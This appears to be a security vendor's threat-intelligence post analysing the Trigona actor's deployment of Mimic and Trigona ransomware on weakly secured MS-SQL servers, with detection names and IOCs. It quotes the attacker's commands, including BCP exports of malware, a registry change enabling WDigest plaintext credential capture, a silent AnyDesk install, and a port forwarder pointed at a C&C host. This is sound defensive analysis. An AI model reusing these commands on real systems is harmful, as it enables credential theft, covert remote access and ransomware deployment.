Trigona Ransomware Threat Actor Uses Mimic Ransomware

AhnLab SEcurity intelligence Center (ASEC) has recently identified a new activity of the Trigona ransomware threat actor installing Mimic ransomware. Like past cases, the recently detected attack targets MS-SQL servers and is notable for abusing the Bulk Copy Program (BCP) utility in MS-SQL servers during the malware installation process.

• Trigona ransomware: Known to have been active since at least June 2022 [1]; usually targets MS-SQL servers for attacks and is still active.
• Mimic ransomware: First found in June 2022 [2]. In January 2024, a case was identified where a Turkish-speaking threat actor attacked poorly managed MS-SQL servers and installed Mimic. [3]

ASEC first discovered a case of attack using BCP to install Mimic in early January 2024. In mid-January 2024, there were similar types of attacks identified where Trigona was installed instead of Mimic. The threat actor’s email address used in Mimic’s ransom note was not found in other attack cases, but Trigona’s ransom note identified later contained an email address that the Trigona threat actor has been using since early 2023. [4]

Accordingly, the attack detected in mid-January 2024 is thought to be launched by the previous Trigona threat actor, who is also believed to be the same attacker behind the Mimic ransomware attack discovered in early January 2024. This is based on the facts that both cases targeted poorly managed MS-SQL servers, BCP was used for malware installation, and the various strings and paths used in attacks were the same. In addition, the same malware strain was used in each attack case.

1. Trigona Ransomware

Trigona ransomware is developed in Delphi and uses RSA and AES encryption algorithms when encrypting files. A report by Arete in February 2023 confirmed a case of Trigona attacking the ManageEngine vulnerability (CVE-2021-40539) [5]. Also, AhnLab’s ASEC Blog in April 2023 covered a case where it targeted poorly managed MS-SQL servers. [6]

MS-SQL servers were targeted again in the recent attack case like cases of 2023, and with the threat actor’s email address saved in the ransom note, it was confirmed that the recently detected Trigona ransomware’s threat actor was the same attacker responsible for previous cases.

• Email: farusbig@tutanota[.]com
• URL: hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/

2. Mimic Ransomware

Mimic ransomware is known for abusing a file search program called Everything while looking for files to encrypt. The threat actor is believed to be employing the Everything tool to accelerate the encryption of files in the target system. The attacker also copied some features of Conti ransomware whose source code was leaked during the development stage. [7]

The Mimic ransomware samples in the Trend Micro report released in January 2023 and the Securonix report released in January 2024 almost had the same external structure as the one used in this attack. The malware was made into a 7z SFX executable and contains a compressed file named “Everything64.dll” which is a password-protected collection of the actual malware files and the Everything tool. When the malware is executed, the 7z and “Everything64.dll” compressed files are decompressed using the appropriate passwords as shown below.

> 7za.exe x -y -p58042791667523172 Everything64.dll > 7za.exe x -y -p624417568130113444 Everything64.dll

The folder that is ultimately installed not only contains Mimic ransomware and the Everything tool, but also the Defender Control tool (DC.exe) for deactivating Windows Defender and the SDelete tool (xdel.exe) of Sysinternals.

The threat actor’s email address in the ransom note is different from those used in the Mimic ransomware samples in the January 2023 Trend Micro report and the January 2024 Securonix report, and it is not found in other attack cases either. On the other hand, it is presumed that the Trigona ransomware threat actor is also using Mimic in their attacks based on multiple circumstances that will be discussed later in this post.

• Email: [email protected]

3. Malware Installation Using BCP

Attack targets are deemed to be poorly managed and externally exposed MS-SQL servers that have simple account credentials, rendering them vulnerable to brute force or dictionary attacks. This can be inferred not only from the fact that the Trigona ransomware threat actor has been targeting these systems in attacks from the past, but also from infection logs of malware strains including LoveMiner and Remcos RAT from before and after the respective attack processes.

3.1. Creating Files Using BCP

The BCP utility bcp.exe is a command line tool used to import or export high volumes of external data in MS-SQL servers. It is generally used to save large amounts of data saved in the tables of the SQL servers as a local file or to export data files saved in the local system to the SQL server tables.

Threat actors that target MS-SQL servers typically use PowerShell commands to download malware files. Recently, some have been abusing SQLPS, a PowerShell tool included in SQL servers. [8] However, in the case of this attack case, the threat actor most likely employed the method of saving their malware strain in a database and using BCP to create a local file from it.

The threat actor used the following command in “uGnzBdZbsi”, the table containing the Trigona ransomware binary, to export Trigona to a local path. Note that “FODsOZKgAU.txt” is a format file that is thought to contain format information.

The following are BCP commands used to export various malware strains and tools used in the attacks.

• Anydesk
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
• Port forwarder malware
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
• Launcher malware
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
• Mimic ransomware
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt”
• Trigona ransomware
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
• Others
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
  > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”

3.2. Looking Up Information

The commands that the threat actor first executes before creating the malware with BCP (meaning that the attack was successful) are those that look up the infected system’s information as shown below. The threat actor would install malware strains suitable for the environment based on the information gained through these commands.

> hostname > whoami > wmic computersystem get domain > wmic computersystem get totalphysicalmemory

3.3. Stealing Account Credentials

The Trigona threat actor is known to use Mimikatz to steal account credentials. [9] [10] While no logs of Mimikatz were found in the attack process, the attacker sometimes executed a command to configure the UseLogonCredential registry key to obtain the plain text password using the WDigest security package.

> REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001

3.4. AnyDesk

In addition, the threat actor installed AnyDesk to control the infected system. AnyDesk is a remote administration tool that provides various features such as remote desktop and file transfer. Remote desktop is a feature that allows a user to remotely access an environment installed with RDP or AnyDesk and control it in the GUI environment.

AnyDesk is a major remote administration tool abused not only by the aforementioned Trigona ransomware attacker, but also by most threat groups. There are many cases where remote administration tools are used for legitimate purposes such as working from home or remote control and management. Accordingly, anti-malware products cannot simply detect and block these tools, unlike typical malware strains. Threat actors take advantage of this fact to install remote administration tools instead of RAT-type malware during the initial infiltration or lateral movement phases to control the target system.

> %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent > %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id”

4. Analysis of Malware Used in the Attack

Besides using BCP, another notable fact for the recent attack cases confirmed is that there is evidence of safe mode being utilized. Two additional malware strains deemed to have been created by the threat actor were also found in the Mimic and Trigona ransomware attacks.

One is a launcher that registers itself as a service that can run even in safe mode. When it is run as a service, it executes the program given as an argument. The other is a port forwarder malware which, like the launcher, registers itself as a service that can be run in safe mode. It then activates RDP and supports RDP port forwarding to the address given as an argument.

According to the PDB information, the threat actor named the launcher malware “app2” and the port forwarder “client”.

Although no malware or command log that sets the system boot option to safe mode was found, logs of the MS-SQL server process executing a system restart command was identified as shown below. As the launcher deactivated the safe mode boot option after executing the malware given as an argument, it is likely that the threat actor installed the malware and then rebooted the system in safe mode to run the ransomware.

> shutdown -r -f -t 5

4.1. Launcher Malware

The threat actor executed the launcher malware with the argument shown below. Upon execution, the launcher copies itself into the “C:\windows\temp\LeVfeNXHoa” path. It then carries out the next task according to the given argument. The first argument gives the service name and the second argument gives the path of the file to be copied. The file in the path given by the second argument is moved to the path given by the third argument. The file given through the second argument was the Mimic ransomware.

> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”

The launcher registers itself as a service under the name “1111111” which was given as the first argument and runs additional tasks to allow itself to be run in safe mode. Afterward, it executes the ransomware in the path given as the third argument while running as a service. When the process is complete, it deactivates the safe mode option, allowing the system to be booted up normally again.

4.2. Port Forwarder

The threat actor gave the following argument to execute the port forwarder malware. Port forwarding is a feature where data transmitted from a certain port is forwarded to another port. This malware strain supports port forwarding to the RDP service, or port 3389. Generally, RDP-related port forwarding tools are used to overcome the fact that the threat actor cannot directly access the NAT environment from outside.

The port forwarder first connects to the threat actor’s address using the reverse connection method and then connects to the RDP port of the infected system, relaying the two connections. Accordingly, the threat actor is able to establish an RDP connection even if the target system is running in a NAT environment, allowing them to control the infected system remotely. Because RDP is utilized in this manner, malware strains may execute the following commands to additionally enable the RDP service.

When the port forwarder is executed in installation mode, it copies itself into the “C:\windows\temp\WindowsHostServicess.exe” path and registers itself as a service under the name “WindowsHostServicess”. The service is configured so that it can be run in safe mode like the launcher malware above.

> %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install

The port forwarder has five arguments. Three of these are modes that support the installation, uninstallation, and execution features. In execution mode, it does not go through the service installation process mentioned above and instead connects to the C&C server given as an argument to support port forwarding.

Argument	Description
–install	Installation mode
–uninstall	Uninstallation mode
–run	Execution mode
–ip	C&C server’s IP address
–port	C&C server’s port number

Table 1. Port forwarder arguments

Before connecting to the C&C server, it saves basic system information such as the OS info and user and computer names in the “C:\windows\temp\elZDk6geQ8” path, transmitting the information upon the initial connection.

Command	Feature
0x8CC03FAF	Start port forwarding between the C&C server and the RDP service
0x0002C684	Auto-delete

Table 2. Port forwarder arguments

5. Conclusion

Recently, the Trigona ransomware threat actor has been installing the Mimic and Trigona ransomware strains on poorly managed MS-SQL servers. It has been found that the attacker also attempted to use a malware strain for port forwarding to establish an RDP connection to the infected system and control it remotely.

Ransomware threat actors encrypt infected systems and extort sensitive information to threaten the victims to raise profits. Because they employ various techniques for account credential theft and lateral movement, single systems as well as the entire internal company network may be at risk of being compromised, resulting in having sensitive data stolen and systems in the network encrypted.

Typical attacks that target MS-SQL servers include brute force attacks and dictionary attacks to systems where account credentials are poorly being managed. Administrators must use passwords that cannot be easily guessed and change them periodically to protect the database servers from brute force and dictionary attacks.

V3 must also be updated to the latest version to block malware infection in advance. Administrators should also use security programs such as firewalls for database servers accessible from outside to restrict access by external threat actors. If the above measures are not taken in advance, continuous infections by threat actors and malware can occur.

File Detection
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574265 (2024.01.14.03)

Behavior Detection
– Malware/MDP.Minipulate.M71
– Persistence/MDP.AutoRun.M203
– DefenseEvasion/MDP.ModifyRegistry.M1234
– Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367

IOC
MD5
– a24bac9071fb6e07e13c52f65a093fce: Launcher (pp2.exe)
– a6e2722cff3abb214dc1437647964c57: Launcher (pp2.exe)
– 3e26e778a4d28003686596f988942646: Port Forwarder (4.exe)
– d6b4b1b6b0ec1799f57142798c5daf5b: Mimic Ransomware Dropper (K2K.exe)
– 6d44f8f3c1608e5958b40f9c6d7b6718: Mimic Ransomware Dropper (K3K.exe)
– b3c8d81d6f8d19e5c07e1ca7932ed5bf: Mimic Ransomware (K2K.exe)
– a02157550bc9b491fd03cad394ccdfe7: Mimic Ransomware (3usdaa.exe)
– c28b33f7365f9dc72cc291d13458f334: Trigona Ransomware (build.txt)
– ac34ba84a5054cd701efad5dd14645c9: Defender Control (DC.exe)

C&C
– 2.57.149[.]233:3366

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Trigona Ransomware Threat Actor Uses Mimic Ransomware appeared first on ASEC BLOG.

Article Link: Trigona Ransomware Threat Actor Uses Mimic Ransomware - ASEC BLOG